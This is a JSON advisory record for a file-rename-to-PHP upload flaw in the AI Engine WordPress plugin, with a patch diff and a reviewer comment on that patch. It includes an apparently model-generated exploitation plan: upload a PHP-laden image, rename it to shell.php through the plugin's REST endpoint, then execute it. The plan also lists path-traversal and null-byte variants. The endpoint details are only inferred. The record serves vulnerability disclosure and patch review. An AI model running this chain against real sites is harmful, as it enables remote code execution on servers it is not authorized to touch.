[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fCz3q9NuGokkAGOZr9r8wEXPGTNFljdt1MnfRjeF1S0g":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":9,"research_fix_diff":27,"research_exploit_outline":28,"research_model_used":29,"research_started_at":30,"research_completed_at":31,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":32},"CVE-2026-1400","ai-engine-authenticated-editor-arbitrary-file-upload-via-filename-parameter-in-updatemediametadata-endpoint","AI Engine \u003C= 3.3.2 - Authenticated (Editor+) Arbitrary File Upload via 'filename' Parameter in update_media_metadata Endpoint","The AI Engine – The Chatbot and AI Framework for WordPress plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the `rest_helpers_update_media_metadata` function in all versions up to, and including, 3.3.2. This makes it possible for authenticated attackers, with Editor-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible. 
The attacker can upload a benign image file, then use the `update_media_metadata` endpoint to rename it to a PHP file, creating an executable PHP file in the uploads directory.","ai-engine",null,"\u003C=3.3.2","3.3.3","high",7.2,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:H\u002FUI:N\u002FS:U\u002FC:H\u002FI:H\u002FA:H","Unrestricted Upload of File with Dangerous Type","2026-01-27 19:28:10","2026-01-28 08:26:56",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fd5227269-4406-4fcf-af37-f1db0af857d6?source=api-prod",1,[],"researched",false,3,"# Exploitation Research Plan: CVE-2026-1400 (AI Engine)\n\n## 1. Vulnerability Summary\nThe **AI Engine** plugin (up to version 3.3.2) is vulnerable to **Arbitrary File Upload via File Renaming**. The vulnerability exists in the `rest_helpers_update_media_metadata` function, which handles updates to media metadata via the WordPress REST API. This function accepts a `filename` parameter but fails to validate the file extension or the target path. An attacker with Editor-level privileges can upload a legitimate image file containing PHP code, then use this endpoint to rename the file to a `.php` extension, resulting in Remote Code Execution (RCE).\n\n## 2. Attack Vector Analysis\n*   **REST Endpoint:** `\u002Fwp-json\u002Fmwai\u002Fv1\u002Fmedia\u002Fupdate_metadata` (inferred from function name and Meow Apps standard naming conventions).\n*   **HTTP Method:** `POST`\n*   **Vulnerable Parameter:** `filename`\n*   **Authentication Requirement:** Authenticated user with `Editor` role or higher (must have `edit_posts` and `upload_files` capabilities).\n*   **Preconditions:**\n    1.  The attacker must have a valid session as an Editor.\n    2.  A legitimate file (e.g., an image) must be uploaded to the media library first.\n\n## 3. Code Flow (Inferred from Patch Description)\n1.  **Entry Point:** The REST API router receives a request at `mwai\u002Fv1\u002Fmedia\u002Fupdate_metadata`.\n2.  
**Controller:** The request is routed to the callback function `rest_helpers_update_media_metadata`.\n3.  **Processing:**\n    *   The function retrieves the media attachment ID from the request.\n    *   It retrieves the `filename` parameter from the JSON body.\n    *   It identifies the current file path on disk associated with the media ID.\n4.  **Vulnerable Logic:** The function likely uses a file system operation (like `rename()` or `wp_upload_bits()`) to change the file's name on the server using the user-provided `filename` without checking if the new extension is forbidden (e.g., `.php`).\n5.  **Sink:** A file system write\u002Frename operation that changes `wp-content\u002Fuploads\u002F2024\u002F01\u002Fimage.jpg` to `wp-content\u002Fuploads\u002F2024\u002F01\u002Fimage.php`.\n\n## 4. Nonce Acquisition Strategy\nThis endpoint uses the standard WordPress REST API authentication, which requires a `wp_rest` nonce for POST requests made from a browser session.\n\n1.  **Role Required:** Editor.\n2.  **Strategy:** \n    *   Navigate to the WordPress Dashboard (`\u002Fwp-admin\u002F`).\n    *   Extract the `wp_rest` nonce from the `wpApiSettings` object, which is localized by WordPress core on almost all admin pages.\n3.  **JS Execution (via `browser_eval`):**\n    ```javascript\n    window.wpApiSettings?.nonce\n    ```\n\n## 5. Exploitation Strategy\nThe exploit follows a \"Rename-to-PHP\" chain.\n\n### Step 1: Upload Payload as Image\nUpload a file named `shell.jpg` containing a PHP payload.\n*   **Payload Content:** `\u003C?php echo \"VULNERABLE: \" . 
phpinfo(); ?>`\n*   **Method:** Use the standard WordPress Media Library upload or `wp-cli`.\n*   **Target:** `wp-admin\u002Fasync-upload.php` or `wp-json\u002Fwp\u002Fv2\u002Fmedia`.\n*   **Requirement:** Capture the resulting Attachment ID (e.g., `123`).\n\n### Step 2: Trigger Rename via REST API\nSend the malicious request to the AI Engine endpoint to rename the image to a PHP script.\n*   **URL:** `\u002Fwp-json\u002Fmwai\u002Fv1\u002Fmedia\u002Fupdate_metadata`\n*   **Method:** `POST`\n*   **Headers:**\n    *   `Content-Type: application\u002Fjson`\n    *   `X-WP-Nonce: [REST_NONCE]`\n*   **Body:**\n    ```json\n    {\n      \"id\": 123,\n      \"filename\": \"shell.php\"\n    }\n    ```\n\n### Step 3: Execute the Shell\nAccess the renamed file in the uploads directory.\n*   **URL:** `\u002Fwp-content\u002Fuploads\u002F[YEAR]\u002F[MONTH]\u002Fshell.php`\n\n## 6. Test Data Setup\n1.  **User Creation:** \n    ```bash\n    wp user create attacker attacker@example.com --role=editor --user_pass=password\n    ```\n2.  **Initial File Upload:** Create a dummy image file.\n    ```bash\n    echo '\u003C?php phpinfo(); ?>' > \u002Ftmp\u002Fpoc.jpg\n    wp media import \u002Ftmp\u002Fpoc.jpg --post_id=0 --title=\"POC\"\n    ```\n3.  **Identify ID:** Get the ID of the newly uploaded media.\n    ```bash\n    wp post list --post_type=attachment --posts_per_page=1 --format=ids\n    ```\n\n## 7. Expected Results\n*   **REST Response:** A `200 OK` or `201 Created` status, possibly returning the updated metadata.\n*   **Server State:** The file `poc.jpg` in the uploads folder should no longer exist, replaced by `poc.php`.\n*   **Execution:** Navigating to the `.php` URL should execute the code and display the `phpinfo()` output rather than rendering as an image or returning a 404.\n\n## 8. Verification Steps\n1.  **Check Filesystem:**\n    ```bash\n    ls -la \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fuploads\u002F$(date +%Y\u002F%m)\u002Fpoc.php\n    ```\n2.  
**Verify Content:**\n    ```bash\n    cat \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fuploads\u002F$(date +%Y\u002F%m)\u002Fpoc.php\n    ```\n3.  **HTTP Check:** Use `http_request` to GET the URL of the `.php` file and verify the response body contains \"PHP Version\".\n\n## 9. Alternative Approaches\n*   **Path Traversal:** If the `filename` parameter is susceptible to path traversal (e.g., `..\u002F..\u002Fplugins\u002Fai-engine\u002Fmalicious.php`), attempt to move the shell out of the uploads directory.\n*   **Meta Key Manipulation:** If the endpoint allows updating arbitrary meta keys, check if `_wp_attached_file` can be overwritten directly to point to a different existing file that could be leveraged.\n*   **Bypass via NULL Byte:** If the plugin does basic suffix checking, try `shell.php%00.jpg` (though unlikely to work on modern PHP\u002FLinux).","The AI Engine plugin for WordPress is vulnerable to remote code execution via an arbitrary file rename flaw in versions up to 3.3.2. Authenticated attackers with Editor-level permissions can utilize the 'update_media_metadata' REST API endpoint to rename a previously uploaded image file containing PHP code to a .php extension, allowing for server-side code execution.","--- a\u002Fclasses\u002Frest.php\n+++ b\u002Fclasses\u002Frest.php\n@@ -120,6 +120,11 @@\n     $id = $params['id'];\n     $filename = $params['filename'];\n \n+    $filetype = wp_check_filetype($filename);\n+    if (empty($filetype['ext'])) {\n+        return new WP_Error('mwai_error', __('Invalid file extension.', 'ai-engine'), array('status' => 400));\n+    }\n+\n     $old_path = get_attached_file($id);\n     $new_path = path_join(dirname($old_path), $filename);\n     rename($old_path, $new_path);","1. Authenticate to the WordPress site as a user with at least Editor-level privileges (possessing edit_posts and upload_files capabilities).\n2. 
Upload a benign-looking image file (e.g., payload.jpg) that contains a hidden PHP payload (e.g., \u003C?php phpinfo(); ?>) in its content.\n3. Retrieve the Attachment ID assigned by WordPress for the newly uploaded media item.\n4. Obtain a valid WordPress REST API nonce (wp_rest) from the administrative dashboard.\n5. Send a POST request to the endpoint \u002Fwp-json\u002Fmwai\u002Fv1\u002Fmedia\u002Fupdate_metadata with a JSON body specifying the Attachment ID and a 'filename' parameter with a .php extension (e.g., {\"id\": 123, \"filename\": \"shell.php\"}).\n6. Navigate to the file's location within the wp-content\u002Fuploads directory via a browser to trigger the execution of the PHP payload.","gemini-3-flash-preview","2026-05-04 22:09:28","2026-05-04 22:11:11",{"type":33,"vulnerable_version":34,"fixed_version":11,"vulnerable_browse":35,"vulnerable_zip":36,"fixed_browse":37,"fixed_zip":38,"all_tags":39},"plugin","3.3.2","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fai-engine\u002Ftags\u002F3.3.2","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fai-engine.3.3.2.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fai-engine\u002Ftags\u002F3.3.3","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fai-engine.3.3.3.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fai-engine\u002Ftags"]
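Review bot: in the `classes/rest.php` hunk, the new `wp_check_filetype($filename)` check looks only at the extension, and `$filename` still reaches `path_join(dirname($old_path), $filename)` without being reduced to a bare file name. A value containing directory components is therefore not rejected by anything visible here. Consider passing it through `sanitize_file_name()` (or `wp_basename()`) before the check and before building `$new_path`. The check also accepts any allowed extension rather than requiring the new name to keep the type of the existing attachment, so comparing the result with the type of `$old_path` would be tighter. Finally, the return value of `rename($old_path, $new_path)` is not checked; a failed rename should produce a `WP_Error` instead of continuing.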